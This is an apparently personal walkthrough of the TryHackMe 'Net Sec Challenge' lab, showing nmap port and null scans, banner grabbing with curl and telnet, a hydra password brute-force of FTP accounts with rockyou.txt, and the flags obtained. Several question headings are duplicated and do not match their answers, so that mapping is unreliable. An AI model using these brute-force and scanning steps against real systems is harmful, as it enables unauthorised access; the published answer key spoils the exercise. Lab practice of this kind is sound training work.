Net Sec Challenge
- ๐ Website: TryHackMe
- ๐ฅ Level: Medium
- ๐ฅ๏ธ OS: N/D
- ๐ Link: Net Sec Challenge
Description
Use this challenge to test your mastery of the skills you have acquired in the Network Security module. All the questions in this challenge can be solved using only nmap, telnet, and hydra.
โQuestion¶
What is the highest port number being open less than 10,000?
๐ Walkthrough¶
root@ip-10-10-248-63:~# nmap -p- 10.10.131.183
Starting Nmap 7.80 ( https://nmap.org ) at 2025-10-29 15:03 GMT
mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.10.131.183
Host is up (0.0030s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8080/tcp open http-proxy
10021/tcp open unknown
MAC Address: 02:3F:DC:8C:F5:63 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 3.98 seconds
Answer
8080
โQuestion¶
There is an open port outside the common 1000 ports; it is above 10,000. What is it?
๐ Walkthrough¶
From the output above
Answer
10021
โQuestion¶
There is an open port outside the common 1000 ports; it is above 10,000. What is it?
๐ Walkthrough¶
From the output above
Answer
6
โQuestion¶
There is an open port outside the common 1000 ports; it is above 10,000. What is it?
๐ Walkthrough¶
root@ip-10-10-248-63:~# curl -v 10.10.131.183
* Trying 10.10.131.183:80...
* TCP_NODELAY set
* Connected to 10.10.131.183 (10.10.131.183) port 80 (#0)
> GET / HTTP/1.1
> Host: 10.10.131.183
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Vary: Accept-Encoding
< Content-Type: text/html
< Accept-Ranges: bytes
< ETag: "229449419"
< Last-Modified: Tue, 14 Sep 2021 07:33:09 GMT
< Content-Length: 226
< Date: Wed, 29 Oct 2025 15:06:01 GMT
< Server: lighttpd THM{***}
<
<!DOCTYPE html>
<html lang="en">
<head>
<title>Hello, world!</title>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width,initial-scale=1" />
</head>
<body>
<h1>Hello, world!</h1>
</body>
</html>
* Connection #0 to host 10.10.131.183 left intact
Answer
THM{web_server_25352}
โQuestion¶
What is the flag hidden in the SSH server header?
๐ Walkthrough¶
root@ip-10-10-248-63:~# telnet 10.10.131.183 22
Trying 10.10.131.183...
Connected to 10.10.131.183.
Escape character is '^]'.
SSH-2.0-OpenSSH_8.2p1 THM{***}
Answer
THM{946219583339}
โQuestion¶
We have an FTP server listening on a nonstandard port. What is the version of the FTP server?
๐ Walkthrough¶
root@ip-10-10-248-63:~# telnet 10.10.131.183 10021
Trying 10.10.131.183...
Connected to 10.10.131.183.
Escape character is '^]'.
220 (***)
Answer
vsFTPd 3.0.5
โQuestion¶
We learned two usernames using social engineering: eddie and quinn. What is the flag hidden in one of these two account files and accessible via FTP?
๐ Walkthrough¶
Let's crack using rockyou.txt
root@ip-10-10-248-63:~# echo "eddie">users.txt
root@ip-10-10-248-63:~# echo "quinn">>users.txt
root@ip-10-10-248-63:~# hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ftp://10.10.131.183:10021
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-10-29 15:13:14
[DATA] max 16 tasks per 1 server, overall 16 tasks, 28688796 login tries (l:2/p:14344398), ~1793050 tries per task
[DATA] attacking ftp://10.10.131.183:10021/
[10021][ftp] host: 10.10.131.183 login: eddie password: jordan
[10021][ftp] host: 10.10.131.183 login: quinn password: andrea
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-10-29 15:13:45
root@ip-10-10-248-63:~#
eddie:jordan. root@ip-10-10-248-63:~# ftp 10.10.131.183 10021
Connected to 10.10.131.183.
220 (vsFTPd 3.0.5)
Name (10.10.131.183:root): eddie
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp>
quinn:andrea. root@ip-10-10-248-63:~# ftp 10.10.131.183 10021
Connected to 10.10.131.183.
220 (vsFTPd 3.0.5)
Name (10.10.131.183:root): quinn
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r-- 1 1002 1002 18 Sep 20 2021 ftp_flag.txt
226 Directory send OK.
ftp> get ftp_flag.txt
local: ftp_flag.txt remote: ftp_flag.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for ftp_flag.txt (18 bytes).
226 Transfer complete.
18 bytes received in 0.00 secs (27.6386 kB/s)
ftp> quit
221 Goodbye.
root@ip-10-10-248-63:~# cat ftp_flag.txt
THM{***}
root@ip-10-10-248-63:~#
Answer
THM{321452667098}
โQuestion¶
Browsing to http://10.10.131.183:8080 displays a small challenge that will give you a flag once you solve it. What is the flag?
๐ Walkthrough¶
Let's land on the website.
We have to do a sneaky port scan. Let's use a Null Scan
root@ip-10-10-248-63:~# nmap -sN 10.10.131.183
Starting Nmap 7.80 ( https://nmap.org ) at 2025-10-29 15:18 GMT
mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.10.131.183
Host is up (0.0025s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
22/tcp open|filtered ssh
80/tcp open|filtered http
139/tcp open|filtered netbios-ssn
445/tcp open|filtered microsoft-ds
8080/tcp open|filtered http-proxy
MAC Address: 02:3F:DC:8C:F5:63 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 1.39 seconds
Answer
THM{f7443f99}